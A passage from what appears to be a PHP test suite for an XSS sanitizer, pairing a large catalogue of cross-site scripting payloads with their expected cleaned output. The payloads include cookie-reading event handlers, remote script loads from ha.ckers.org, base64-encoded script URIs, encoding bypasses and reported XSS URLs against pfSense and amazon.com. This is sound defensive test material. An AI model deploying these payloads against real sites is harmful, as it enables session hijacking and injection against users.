xmlns:x="http://www.w3.org/1999/xhtml ">alert(1)' => '<?xml version="1.0" encoding="utf-8" ?><x:script |
|
396
|
|
|
xmlns:x="http://www.w3.org/1999/xhtml ">alert(1)', // IE11 |
|
397
|
|
|
'<%/%=%><p/onresize=alert(1)//>' => '<%/%=%><p/>', |
|
398
|
|
|
'<style><img src="</style><img src=x onerror=alert(1)//">' => '<style><img ><img ">', |
|
399
|
|
|
'<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>' => '<head><base href="//"/></head><body><a href="">XXX</a></body>', |
|
400
|
|
|
'<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>' => 'alert(1)', |
|
401
|
|
|
'<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>' => '<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="(1)"></OBJECT>', |
|
402
|
|
|
'<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>' => '<object data="PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>', |
|
403
|
|
|
'<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>' => '<embed src="PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>', |
|
404
|
|
|
'<b <script>alert(1)//</script>0</script></b>' => '<b 0</b>', |
|
405
|
|
|
'<// style=x:expression\28write(1)\29>' => '<// >', // IE7 |
|
406
|
|
|
'<style>*{x:expression(write(1))}</style>' => '<style>*{x:expression(write(1))}</style>', // IE6 |
|
407
|
|
|
'<div style="background:url(test5.svg)">PRESS ENTER</div>' => '<div >PRESS ENTER</div>', // Up to Opera 12.x |
|
408
|
|
|
'<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>' => '<?xml-stylesheet type="text/css"?><root />', // IE7 |
|
409
|
|
|
'<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>' => '<?xml-stylesheet type="text/css" href="data:,*{x:write(2));}"?>', // IE8 -> IE10 |
|
410
|
|
|
'<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>' => '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="(1)//#x"/>', |
|
411
|
|
|
'<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>' => '<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>', |
|
412
|
|
|
'<!-- `<img/src=xx:xx onerror=alert(1)//--!>' => '<!-- `<img/>', |
|
413
|
|
|
'<title onpropertychange=alert(1)></title><title title=></title>' => '<title ></title><title title=></title>', |
|
414
|
|
|
'<iframe src="data:text/html,<iframe src=\'data:text/html,%26lt;iframe onload=alert(1)>\'>"></iframe>' => '< iframe src="data:text/html,<iframe src=\'data:text/html,<iframe >\'>"></iframe>', |
|
415
|
|
|
'<!--<img src="--><img src=x onerror=alert(1)//">' => '<!--<img >< >', |
|
416
|
|
|
'<frameset onload=alert(1)>' => '< frameset >', |
|
417
|
|
|
'<body oninput=alert(1)><input autofocus>' => '< body >< input autofocus>', |
|
418
|
|
|
'<video poster=javascript:alert(1)//></video>' => '< video poster=(1)//></video>', |
|
419
|
|
|
'<a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>' => '<a >X</a>', |
|
420
|
|
|
'<a href="applescript://com.apple.scripteditor?action=new&script=display%20dialog%20%22Hello%2C%20World%21%22">applescript</a>' => '<a href="//com.apple.scripteditor?action=new&script=display dialog ">applescript</a>', |
|
421
|
|
|
'<a onmouseoveronmouseover="alert(document.cookie)"onmouseover="alert(document.cookie)">xxs</a>' => '<a >xxs</a>', |
|
422
|
|
|
'<a onmouseover="alert(document.cookie)">xxs</a>' => '<a >xxs</a>', |
|
423
|
|
|
'<a onmouseover=alert(document.cookie)>xxs</a>' => '<a >xxs</a>', |
|
424
|
|
|
'<a onerror="alert(document.cookie)">xxs</a>' => '<a >xxs</a>', |
|
425
|
|
|
'<a onerror=`alert(document.cookie)`>xxs</a>' => '<a >xxs</a>', |
|
426
|
|
|
'<a href=http://foo.bar STYLE=xss:expression(alert("XSS"))>xxs style</a>' => '<a >xxs style</a>', |
|
427
|
|
|
'<SCRIPT>alert(\'XSS\');</SCRIPT>' => '', |
|
428
|
|
|
'\'\';!--"<XSS onclick="alert">=&{()}' => '\'\';!--"<XSS >=&{()}', |
|
429
|
|
|
'<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' => '', |
|
430
|
|
|
'<IMG SRC="javascript:alert(\'XSS\');">' => '<IMG SRC="(\'XSS\');">', |
|
431
|
|
|
'<IMG SRC=javascript:alert(\'XSS\')>' => '<IMG >', |
|
432
|
|
|
'<IMG SRC=JaVaScRiPt:alert(\'XSS\')>' => '<IMG >', |
|
433
|
|
|
'<IMG SRC=javascript:alert("XSS")>' => '<IMG >', |
|
434
|
|
|
'<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>' => '<IMG >', |
|
435
|
|
|
'<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' => '<IMG >', |
|
436
|
|
|
'SRC=
<IMG 6;avascript:alert('XSS')>' => 'SRC=
<IMG 6;avascript:alert(\'XSS\')>', |
|
437
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
438
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
439
|
|
|
'<IMG SRC="jav ascript:alert(\'XSS\');">' => '<IMG SRC="(\'XSS\');">', |
|
440
|
|
|
'<IMG SRC="jav	ascript:alert(\'XSS\');">' => '<IMG SRC="(\'XSS\');">', |
|
441
|
|
|
'<IMG SRC="jav
ascript:alert(\'XSS\');">' => '<IMG src="">', |
|
442
|
|
|
'<IMG SRC="  javascript:alert(\'XSS\');">' => '<IMG SRC="  (\'XSS\');">', |
|
443
|
|
|
'<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a\'%0aX%0aS%0aS%0a\'%0a)%0a"%0a>' => "<IMG\nSRC\n=\n\"\n(\n'\nX\nS\nS\n'\n)\n\"\n>", |
|
444
|
|
|
'<IMG SRC=java%00script:alert(\"XSS\")>' => '<IMG >', |
|
445
|
|
|
'<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>' => '', |
|
446
|
|
|
'<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => '', |
|
447
|
|
|
'<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>' => '', |
|
448
|
|
|
'<IMG SRC="javascript:alert(\'XSS\')"' => '<IMG SRC="(\'XSS\')"', |
|
449
|
|
|
'<SCRIPT>a=/XSS/' => '', |
|
450
|
|
|
'\";alert(\'XSS\');//' => '\";alert(\'XSS\');//', |
|
451
|
|
|
'<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">' => '<INPUT TYPE="IMAGE" SRC="(\'XSS\');">', |
|
452
|
|
|
'<BODY BACKGROUND="javascript:alert(\'XSS\')">' => '<BODY BACKGROUND="(\'XSS\')">', |
|
453
|
|
|
'<BODY ONLOAD=alert(\'XSS\')>' => '<BODY >', |
|
454
|
|
|
'<IMG DYNSRC="javascript:alert(\'XSS\')">' => '<IMG DYNSRC="(\'XSS\')">', |
|
455
|
|
|
'<IMG LOWSRC="javascript:alert(\'XSS\')">' => '<IMG LOWSRC="(\'XSS\')">', |
|
456
|
|
|
'<BGSOUND SRC="javascript:alert(\'XSS\');">' => '<IMG >', |
|
457
|
|
|
'<DIV STYLE="width:' . "\n" . 'expression(alert(\'XSS\'));">' => '<DIV >', |
|
458
|
|
|
'<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>' => '<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>', |
|
459
|
|
|
'<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">' => '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">', |
|
460
|
|
|
'<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">' => '<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">', |
|
461
|
|
|
'<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d' => '<link rel=stylesheet href=data:,*{x:write(1))}', |
|
462
|
|
|
'<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>' => '<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>', |
|
463
|
|
|
'<style>p[foo=bar{}*{-o-link:\'javascript:alert(1)\'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>' => '<style>p[foo=bar{}*{-o-link:\'(1)\'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>', |
|
464
|
|
|
'<DIV STYLE="width: expression(alert(\'XSS\'));">lall</div>' => '<DIV >lall</div>', |
|
465
|
|
|
'<DIV STYLE=\'width: expression(alert("XSS"));\'>lall</div>' => '<DIV >lall</div>', |
|
466
|
|
|
'<DIV STYLE="width: expression(alert(\'XSS\'));" title="lall" STYLE=\'width: expression(alert("XSS"));\'>lall</div>' => '<DIV title="lall" >lall</div>', |
|
467
|
|
|
'<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">' => '<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">', |
|
468
|
|
|
'<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>' => '<STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>', |
|
469
|
|
|
'<IMG SRC=\'vbscript:msgbox("XSS")\'>' => '<IMG SRC=\'("XSS")\'>', |
|
470
|
|
|
'<IMG SRC="mocha:[code]">' => '<IMG SRC="">', |
|
471
|
|
|
'<IMG SRC="livescript:[code]">' => '<IMG SRC="">', |
|
472
|
|
|
'<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">' => '<META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">', |
|
473
|
|
|
'<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">' => '<META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">', |
|
474
|
|
|
'<META HTTP-EQUIV="Link" Content="<javascript:alert(\'XSS\')>; REL=stylesheet">' => '<META HTTP-EQUIV="Link" Content="<(\'XSS\')>; REL=stylesheet">', |
|
475
|
|
|
'<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">' => '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=(\'XSS\');">', |
|
476
|
|
|
'<a><a><p></a></p><meta property="the:property" content="No results for;url=hxxp://www.maliciousxss.com" HTTP-EQUIV="refresh" blah=" (Page 1)" />foobar</a>' => '<a><a><p></a></p><meta property="the:property" content="No results for;url=hxxp://www.maliciousxss.com" HTTP-EQUIV="refresh" blah=" (Page 1)" />foobar</a>', |
|
477
|
|
|
'<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>' => '<FRAMESET><FRAME SRC="(\'XSS\');"></FRAMESET>', |
|
478
|
|
|
'<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>' => '<FRAMESET><FRAME SRC="(\'XSS\');"></FRAMESET>', |
|
479
|
|
|
'<TABLE BACKGROUND="javascript:alert(\'XSS\')">' => '<TABLE BACKGROUND="(\'XSS\')">', |
|
480
|
|
|
'<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">' => '<DIV >', |
|
481
|
|
|
'<DIV STYLE="width: expression(alert(\'XSS\'));">' => '<DIV >', |
|
482
|
|
|
'<STYLE>@im\port\'\ja\vasc\ript:alert("XSS")\';</STYLE>' => '<STYLE>@im\port\'\ja\vasc\ript:alert("XSS")\';</STYLE>', |
|
483
|
|
|
'<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">' => '<IMG >', |
|
484
|
|
|
'<XSS STYLE="xss:expression(alert(\'XSS\'))">' => '<XSS >', |
|
485
|
|
|
'exp/*<XSS STYLE=\'no\xss:noxss("*//*");>' => 'exp/*<XSS >', |
|
486
|
|
|
'<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>' => '<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>', |
|
487
|
|
|
'<STYLE>.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A CLASS=XSS></A>' => '<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>', |
|
488
|
|
|
'<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>' => '<STYLE type="text/css">BODY{background:url("(\'XSS\')")}</STYLE>', |
|
489
|
|
|
'<BASE HREF="javascript:alert(\'XSS\');//">' => '<BASE HREF="(\'XSS\');//">', |
|
490
|
|
|
'<object allowscriptaccess="always" data="test.swf"></object>' => '<object allowscriptaccess="always" data="test.swf"></object>', |
|
491
|
|
|
'<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>' => '<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>', |
|
492
|
|
|
'<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(\'XSS\')></OBJECT>' => '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=(\'XSS\')></OBJECT>', |
|
493
|
|
|
'getURL("javascript:alert(\'XSS\')")' => 'getURL("(\'XSS\')")', |
|
494
|
|
|
'<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: |
|
495
|
|
|
org/xss.swf" AllowScriptAccess="always"></EMBED>' => '<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: |
|
496
|
|
|
org/xss.swf" AllowScriptAccess="always"></EMBED>', |
|
497
|
|
|
'<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>' => '<EMBED SRC="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', |
|
498
|
|
|
'<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(\'XSS\');">' => '<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG src="">', |
|
499
|
|
|
'<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>' => '<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>', |
|
500
|
|
|
'<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></XML>' => '<XML ID="xss"><I><B><IMG >cript:alert(\'XSS\')"></B></I></XML>', |
|
501
|
|
|
'<HTML><BODY>' => '<HTML><BODY>', |
|
502
|
|
|
'<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>' => '', |
|
503
|
|
|
'<!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#exec cmd="/bin/echo \'=http://ha.ckers.org/xss.js></SCRIPT>\'"-->' => '<!--#exec cmd="/bin/echo \'<!--#exec cmd="/bin/echo \'=http://ha.ckers.org/xss.js>\'"-->', |
|
504
|
|
|
'<? echo(\'<SCR)\';' => '<? echo(\'<SCR)\';', |
|
505
|
|
|
'<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'XSS\')</SCRIPT>">' => '<META HTTP-EQUIV="Set-Cookie" Content="USERID=">', |
|
506
|
|
|
'<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-/SCRIPT+AD4-' => '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>', // UTF-7 |
|
507
|
|
|
'<img src="http://test.de/[0xE0]"> |
|
508
|
|
|
... foo ... |
|
509
|
|
|
... bar ... |
|
510
|
|
|
" onerror="alert(\'XSS\')" |
|
511
|
|
|
<div>lall</div>' => '<img src="http://test.de/[0xE0]"> |
|
512
|
|
|
... foo ... |
|
513
|
|
|
... bar ... |
|
514
|
|
|
" ="alert(\'XSS\')" |
|
515
|
|
|
<div>lall</div>', |
|
516
|
|
|
'<script>+-+-1-+-+alert(1)</script>' => '', |
|
517
|
|
|
'<body/onload=<!-->
alert(1)>' => "<body/>\nalert(1)>", |
|
518
|
|
|
'<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe' => '<a >ClickMe', |
|
519
|
|
|
'<--`<img/src=` onerror=alert(1)> --!>' => '<--`<img/> --!>', |
|
520
|
|
|
'<script/src=data:text/javascript,ale™t(1)></script> ' => ' ', |
|
521
|
|
|
'<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>' => '<meta charset="x-imap4-modified-utf7">&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', |
|
522
|
|
|
'<div id=”3″><meta charset=”x-imap4-modified-utf7″>&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//[“‘`–>]]>]</div>' => '<div id=”3″><meta charset=”x-imap4-modified-utf7″>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//[“‘`–>]]>]</div>', |
|
523
|
|
|
'<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => '" >', |
|
524
|
|
|
'<SCRIPT a=">" \'\' SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => '" \'\' >', |
|
525
|
|
|
'<SCRIPT "a=\'>\'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => '\'" >', |
|
526
|
|
|
'<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => '` >', |
|
527
|
|
|
'onAttribute="bar"' => '="bar"', |
|
528
|
|
|
"onAttribute=\"<script>alert('bar')</script>\"" => '=""', |
|
529
|
|
|
"<BGSOUND SRC=\"javascript:alert('XSS');\">" => '<BGSOUND SRC="(\'XSS\');">', // BGSOUND |
|
530
|
|
|
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "<LINK REL=\"stylesheet\" HREF=\"('XSS');\">", // STYLE sheet |
|
531
|
|
|
'<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</styel>foo' => '<STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</styel>foo', // Remote style sheet |
|
532
|
|
|
"<STYLE>@im\\port'\\jaasc\ript:alert(\"XSS\")';</STYLE>" => "<STYLE>@im\port'\jaasc\ript:alert(\"XSS\")';</STYLE>", // STYLE tags with broken up JavaScript for XSS |
|
533
|
|
|
"<XSS STYLE=\"xss:expression_r(alert('XSS'))\">" => '<XSS >', // Anonymous HTML with STYLE attribute |
|
534
|
|
|
'<XSS STYLE="behavior: url(xss.htc);">' => '<XSS >', // Local htc file |
|
535
|
|
|
'¼script¾alert(¢XSS¢)¼/script¾' => '', // US-ASCII encoding |
|
536
|
|
|
"<IMG defang_SRC=javascript:alert\("XSS"\)>" => '<IMG >', // IMG |
|
537
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
538
|
|
|
'<img src =x onerror=confirm(document.cookie);>' => '<img >', |
|
539
|
|
|
"<IMG SRC=\"jav ascript:alert('XSS');\">" => '<IMG SRC="(\'XSS\');">', |
|
540
|
|
|
"<IMG SRC=\"jav	ascript:alert('XSS');\">" => '<IMG SRC="(\'XSS\');">', |
|
541
|
|
|
"<IMG SRC=\"jav	ascript:alert)'XSS');\">" => '<IMG SRC=")\'XSS\');">', |
|
542
|
|
|
"<IMG SRC=\"jav
ascript:alert('XSS');\">" => '<IMG SRC="(\'XSS\');">', |
|
543
|
|
|
'<test lall=&amp;#039;jav
ascript:alert(\\&amp;#039;XSS\\&amp;#039;);&amp;#039;>' => "<test lall='(\'XSS\');'>", |
|
544
|
|
|
"<IMG SRC\n=\n\"\nj\na\nv\n
a\ns\nc\nr\ni\np\nt\n:\na\nl\ne\nr\nt\n(\n'\nX\nS\nS\n'\n)\n;\">" => "<IMG SRC\n=\n\"\n(\n'\nX\nS\nS\n'\n)\n;\">", |
|
545
|
|
|
"<IMG SRC=java�script:alert('XSS')>" => '<IMG >', |
|
546
|
|
|
"<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028\\0027\\0058\\0053\\0053\\0027\\0029'\\0029\">" => '<DIV >', |
|
547
|
|
|
"<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>" => '<STYLE>.XSS{background-image:url("(\'XSS\')");}</STYLE><A ></A>', |
|
548
|
|
|
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => '<META HTTP-EQUIV="refresh" CONTENT="0;url=(\'XSS\');">', // META |
|
549
|
|
|
"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => '<IFRAME SRC="(\'XSS\');"></IFRAME>', // IFRAME |
|
550
|
|
|
'<applet code=A21 width=256 height=256 archive="toir.jar"></applet>' => '<applet code=A21 width=256 height=256 archive="toir.jar"></applet>', |
|
551
|
|
|
'<applet code="javascript:confirm(document.cookie);">' => '<applet code="();">', |
|
552
|
|
|
'<script Language="JavaScript" event="FSCommand (command, args)" for="theMovie">...</script>' => '...', // <script> |
|
553
|
|
|
'<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>' => 'PT >', // XSS using HTML quote encapsulation |
|
554
|
|
|
'<SCR�IPT>alert("XSS")</SCR�IPT>' => '', |
|
555
|
|
|
"Би шил идэй чадна,<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>我能吞下玻璃而不傷身體</br>" => 'Би шил идэй чадна,<STYLE>li {list-style-image: url("(\'XSS\')");}</STYLE><UL><LI>我能吞下玻璃而不傷身體</br>', |
|
556
|
|
|
"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\"\; alert(String.fromCharCode(88,83,83))//\"\;alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>" => '\';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"\; alert(String.fromCharCode(88,83,83))//"\;alert(String.fromCharCode(88,83,83))//-->">\'>', |
|
557
|
|
|
'म काँच खान सक्छू र मलाई केहि नी हुन्न् <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>।' => 'म काँच खान सक्छू र मलाई केहि नी हुन्न् <IMG >।', |
|
558
|
|
|
"https://[host]/testing?foo=bar&tab=<script>alert('foobar')</script>" => 'https://[host]/testing?foo=bar&tab=', |
|
559
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_qty=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_qty='\">", // XSS to attack "pfSense" - https://www.htbridge.com/advisory/HTB23251 |
|
560
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_protocolflags=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_protocolflags='\">", |
|
561
|
|
|
'https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_s ourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.php?filterlogentries_submit=1&filterlogentries_s ourceport='\">", |
|
562
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_destinationport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_destinationport='\">", |
|
563
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_destinationipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3 E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_destinationipaddress='\">", |
|
564
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_sourceport=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_sourceport='\">", |
|
565
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_sourceipaddress=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_sourceipaddress='\">", |
|
566
|
|
|
'https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_time=%27%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E' => "https://[host]/diag_logs_filter.phpfilterlogentries_submit=1&filterlogentries_time='\">", |
|
567
|
|
|
"http://www.amazon.com/review/R3FSGZJ3NBYZM/?id=brute'-alert('XSSPOSED' )-'logic" => "http://www.amazon.com/review/R3FSGZJ3NBYZM/?id=brute'-alert('XSSPOSED' )-'logic", // XSS from amazon -> https://www.xssposed.org/search/?search=amazon.com&type=host& |
|
568
|
|
|
"User-Agent: </script><svg/onload=alert('xssposed')>" => 'User-Agent: <svg/>', |
|
569
|
|
|
"https://www.amazon.com/gp/aw/ya/181-1583093-7256013/\"></form><script>a lert('Lohit Tummalapenta')</script>" => 'https://www.amazon.com/gp/aw/ya/181-1583093-7256013/"></form>', |
|
570
|
|
|
"https://aws.amazon.com/amis?ami_provider_id=4&architecture='\"--></ style></script><script>alert(0x015E00)</script>&selection=ami_prov ider_id+architecture" => 'https://aws.amazon.com/amis?ami_provider_id=4&architecture=\'"--></ style>&selection=ami_prov ider_id+architecture', |
|
571
|
|
|
'pipe=ssrProductAds&step=2&userName=1211&replyTo=test%40xssed.com&subjectEscape=&subject=Unable+to+re gister+for+Product+Ads&emailMessageEscape=&emailMessage=&displayName=%27%22%3E%3Ciframe+src%3Dhttp:% 2F%2Fxssed.com%3E&companyURL=&address1=&address2=&city=&state=&zipCode=&country=United+States&ccCard holderName=&ccIssuer=V&addCreditCardNumber=&ccExpMonth=10&ccExpYear=2010&businessAddressCheck=useBus inessAddress&billingAddress1=&billingAddress2=&billingCity=&billingState=&billingZipCode=&billingCou ntry=United+States&Continue=&_pi_legalName=121&_pi_tokenID=A1F3841M9ZHMMV&_pi_pipe=ssrProductAds&_pi _email=kf%40xssed.com&_pi_step=1&_pi_areaCode=112&_pi_phone1=121&_pi_userName=1211&_pi_ext=211221212 1&_pi_phone2=1221' => "pipe=ssrProductAds&step=2&userName=1211&[email protected]&subjectEscape=&subject=Unable+to+re gister+for+Product+Ads&emailMessageEscape=&emailMessage=&displayName='\"><iframe+src=http:% 2F/xssed.com>&companyURL=&address1=&address2=&city=&state=&zipCode=&country=United+States&ccCard holderName=&ccIssuer=V&addCreditCardNumber=&ccExpMonth=10&ccExpYear=2010&businessAddressCheck=useBus inessAddress&billingAddress1=&billingAddress2=&billingCity=&billingState=&billingZipCode=&billingCou 